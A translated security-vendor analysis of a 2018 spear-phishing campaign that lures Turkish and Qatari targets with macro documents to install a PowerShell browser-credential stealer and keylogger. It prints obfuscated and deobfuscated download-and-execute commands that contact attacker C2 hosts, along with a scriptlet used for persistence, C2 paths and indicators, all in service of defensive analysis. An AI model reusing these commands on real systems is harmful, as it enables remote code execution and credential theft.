在我们对威胁进行日常搜索中,我们收到了一条报道,其主要内容为针对土耳其国家的网络钓鱼事件。经过初步评估后,我们决定对这个事件进一步调查。在调查中,我们发现这个安全事件与最近阶段的其他活动有相似之处,也意味着他们可能出自同一个组织之手。
sha256 : [https://t.co/G51LITesM5](https://t.co/G51LITesM5)
ITW Filename : دعوة.doc
sha256 : [https://t.co/Bmef4zlHEl](https://t.co/Bmef4zlHEl)
ITW Filename : إستمارة.doc
The macro in both documents will download and execute the powershell script from hxxp://microsoftdata[.]linkpc[.]net/api/cscript [pic.twitter.com/ndqWSML2eA](https://t.co/ndqWSML2eA)
— Jacob Soo (@_jsoo_) [November 29, 2018](https://twitter.com/_jsoo_/status/1068045034203697152?ref_src=twsrc%5Etfw)
网络钓鱼文件针对的是来自土耳其的受害者,在调查之初,我们也尝试设法去找到针对卡塔尔用户的攻击网络。而这些攻击文件试图引诱人们参加在Instanbul举行的“Al Quds议员协会”会议。而 Al Quds中的Parlamentarians是一个协调“国际议员支持巴勒斯坦事业”的委员会。
谷歌翻译帮助非阿拉伯语使用者理解网络钓鱼活动的具体内容:
该文件邀请参加受害者在12月13日至16日参加举行的会议,题目是“耶路撒冷是巴勒斯坦永恒的首都”。 然而,目前还没有与此会议相关的公告在官方网站上公布。
攻击涉及了两个文档文件,而这两个文档都遵循了相同的传统攻击策略:试图诱使受害者点击“启用内容”按钮来运行恶意代码:
注入代码运行一个命令提示符,调用powershell,然后运行从恶意主机下载的.ps1脚本。
我们使用ReaQta-Hive
还原了攻击流程:
可以看到Winword.exe
生成带有可疑命令行的cmd.exe
实例:
"C:\Windows\System32\cmd.exe" /c " EcHo iEx ( new-oBjeCt sYStem.Io.COmPreSSiON.defLAtEstreAm([system.Io.mEmorYStrEAM] [ConVerT]::fRomBaSE64STRing( 'BcExEkAwEAXQq+hQSHotCg2FgjbWYolNJv6M63uv75asGPirxvViQjYwzMxr44UVpWnDpz64bUISPYr8BGJt7SOUwht2bA7OeNE7klGGdVEsvZQkIi9/') , [sYsTEM.io.compressIOn.CoMpREssiOnmode]::DECOMPRESs )^^^| % {new-oBjeCt io.STreaMreader( $_, [TexT.ENCoDInG]::aSCii )} ).REadtOEnd() | pOwErSheLl -NoeX -nOlo -NOproFiLe -nOnIn -eXeCuTI BypAss -wiNdoWstYL hiDden -"
对命令行进行反混淆操作会传递给powershell.exe
的实际参数详情:
IEX (New-Object Net.WebClient).DownloadString('http://microsoftdata.linkpc.net/api/cscript')
参数传递给powershell的方式是值得研究的的。它似乎是一种逃避命令行监控的方法:
pOwErSheLl -NoeX -nOlo -NOproFiLe -nOnIn -eXeCuTI BypAss -wiNdoWstYL hiDden -
该参数直接与powershell.exe
“回应”,这就是为什么我们在powershell.exe
命令行中看不到通常的iEx [...]
参数的原因。
此时,powershell.exe
利用从hxxp://microsoftdata [.] linkpc [.] net/api/cscript
下载的脚本运行感染目标,下面是其内容的摘要:
powershell的脚本用于窃取来自Chrome,Opera和Firefox的cookie,会话,登录信息,还有一个用于键盘记录的模块。 获得的数据之后被用于渗透到以下C2服务器:
hxxp://microsoftdata[.]linkpc[.]net
该脚本下载与浏览器的localdb
(分析窗口#4)交互所需的sqlite DLL
,它创建一个GlobalMutex Global\rYF1pgeADA
以避免攻击程序窃取多个目标的信息。它将初始化键盘记录器并循环捕获所需的功能信息,最后建立持久性。
应特别注意黑客所使用的攻击持久性方法:计划任务用于持续攻击。
之后,下列代码会被执行:
<?XML version="1.0"?>
<scriptlet>
<registration
progid="rYF1pgeADA"
classid="{3cf925ab-14c5-4324-9b5c-bbe294ac03a0}" >
<script language="JScript">
<![CDATA[
p = 'Powershell';
c = ' -WiND hiDdeN -nOproFILe -eXeCUTiON bypaSS -Nol -ComMa "iEx ( new-oBjeCt sYStem.Io.COmPreSSiON.defLAtEstreAm([system.Io.mEmorYStrEAM] [ConVerT]::fRomBaSE64STRing( \'BcExEkAwEAXQq+hQSHotCg2FgjbWYolNJv6M63uv75asGPirxvViQjYwzMxr44UVpWnDpz64bUISPYr8BGJt7SOUwht2bA7OeNE7klGGdVEsvZQkIi9/\') , [sYsTEM.io.compressIOn.CoMpREssiOnmode]::DECOMPRESs )| % {new-oBjeCt io.STreaMreader( $_, [TexT.ENCoDInG]::aSCii )} ).REadtOEnd() "';
r = new ActiveXObject("WScript.Shell").Run(p + c,0,false);
]]>
</script>
</registration>
</scriptlet>
ReaQta-Hive自动识别此程序存在异常行为,并重启此代码,如下图所示:
如上所述,在网络钓鱼活动中提供的脚本可以从谷歌Chrome / Firefox / Opera中窃取cookie和登录信息,之后键盘记录具有持久性并执行squiblydoo攻击计划的目标。该脚本接受从C2部署的自定义脚本,这意味着攻击者可以随意扩展其功能:
我们在下面列出功能列表以供将来参考所用:
function Set-Key
function Set-EncryptedData
function Uid
function CookiesTo-MYJson ([System.Collections.ArrayList] $ArrayList)
function PasswordsTo-MYJson ([System.Collections.ArrayList] $ArrayList)
function unProtecte ($data)
function ChromeDB
function FirefoxDB
function OperaDB
function Add-SQLite ($link)
function urlPOST($link,$data)
function OperaSESSION ($SQLiteDB,$search,$condition)
function FirefoxSESSION ($SQLiteDB,$search,$condition)
function ChromeSESSION ($SQLiteDB,$search,$condition)
function ChromePASS ($SQLiteDB)
function BrowsersLOGINS
function _sct
function InstallSCT
function BrowsersPS
function BrowsersLOGGER
function InitLOGGER
function BrowsersCOOKIES ($website,$cname)
键盘记录器似乎使用的代码似乎与github存储库获取的代码相同:
https://github.com/lazywinadmin/PowerShell/blob/master/TOOL-Start-KeyLogger/Start-KeyLogger.ps1
C2始终展现出一个有趣的现象,URL的路径始终是:/api/{endpoint}
:
http://{$domain}/api/cscript
http://{$domain}/api/pscript
http://{$domain}/api/logger/submit
http://{$domain}/api/chrome/submit
http://{$domain}/api/firefox/submit
http://{$domain}/api/opera/submit
http://{$domain}/assest/sqlite
在前人研究的信息帮助下,我们能够在以前的网络钓鱼活动中所使用的模式中发现其他样本:
Malicious document targeting [#Qatar](https://twitter.com/hashtag/Qatar?src=hash&ref_src=twsrc%5Etfw), impersonates [@qcharity](https://twitter.com/qcharity?ref_src=twsrc%5Etfw)
Embedded macros download a PowerShell script from:
4host[.]publicvm[.]com/api/cscript
Steals passwords and cookies from browsers
MD5: 9d6ccae4ef4a206345005e58e51ca6cb [pic.twitter.com/Ptrr0iIJi4](https://t.co/Ptrr0iIJi4)
— Curly Cyber (@CurlyCyber) [August 21, 2018](https://twitter.com/CurlyCyber/status/1031937765317980160?ref_src=twsrc%5Etfw)
正如一开始所指出的那样,这个先前的样本似乎将目标对准了卡塔尔的用户,并冒充卡塔尔的慈善机构组织。
该文档最初是在2018年8月初
被发现的,而与当前版本相比其只有少量代码被更改。具体更改的位置是行为,持久性和脚本代码。
我们已经上传了VirusTotal的安全分析过程。 在分析窗口#1中,我们可以看到cmd.exe的命令行并没有使用模糊处理:
"C:\Windows\System32\cmd.exe" /C"Echo\IEX (New-Object Net.WebClient).DownloadString('http://4host.publicvm.com/api/cscript') | PowersHell -NOpROfIL -eX BYpAss -NOlOgo -wiNdoWs HiDdEN -noeXIt -noNI -"
为了使分析具有完整性,这里使用了以前版本的powershell脚本并做了一些更改:
原始平台地址:
hxxp://4host[.]publicvm[.]com/
这三个文档共享一个相似的元数据结构:
我们可以观察到这两个事件的相似性,这两个域都使用相同的自由动态DNS服务:DNSExit
。
由于这个攻击设计了多个潜在的目标,所以是十分有趣的。除此之外,系统还使用了系统二进制文件(lolbins)并通过powershell执行恶意活动、计划任务持久性和用于隐藏命令行的“回声”技术。这个事件的攻击者十分活跃,根据我们的研究发现,所检索的文件类型提供了证据证明这些行动可能是出于政治动机,而不是网络犯罪团伙的私人攻击。
由于Spear-Phishing
的易操作性,经过培训的人员很容易使用此攻击进行攻击,所以其工具也受到攻击者的喜爱。
ReaQta-Hive使用人工智能自动检测目标(如刚刚分析的威胁),帮助分析师深入检测威胁活动并自动发现异常行为。由于缺乏传统的二进制的payload,操作系统组件(lolbins)上的内存威胁能够绕过传统防御,同时留下较低的取证范围。如果想要进一步了解相关威胁情况,请与我们联系。
1d2bbe3fd9021bbed4667628b86156bee8763b3d93cdac6de398c751a281a324 دعوة.doc
bf4d4ee4a8e4472c7968586fa0318e556a89bfd94aeb4e72afd99ab340541770 إستمارة.doc
7a26d5b600a078816beb3a2849827fa7d45ec85ec6c3343b3857f10edfece74c cscript.ps1
hxxp://microsoftdata[.]linkpc[.]net
7c8cf1e3ec35a6f604699f6481f3463e9ae19c93b8efd861b914c8260304d314 qatar.doc
hxxp://4host[.]publicvm[.]com
Global\rYF1pgeADA mutex
Global\wfCQnIo2G7 mutex
http://{$domain}/api/cscript
http://{$domain}/api/pscript
http://{$domain}/api/logger/submit
http://{$domain}/api/chrome/submit
http://{$domain}/api/firefox/submit
http://{$domain}/api/opera/submit
http://{$domain}/assest/sqlite
rYF1pgeADA scheduled task name
wfCQnIo2G7 scheduled task name
本文为翻译稿,翻译自:https://reaqta.com/2018/12/spear-phishing-targeting-qatar-turkey/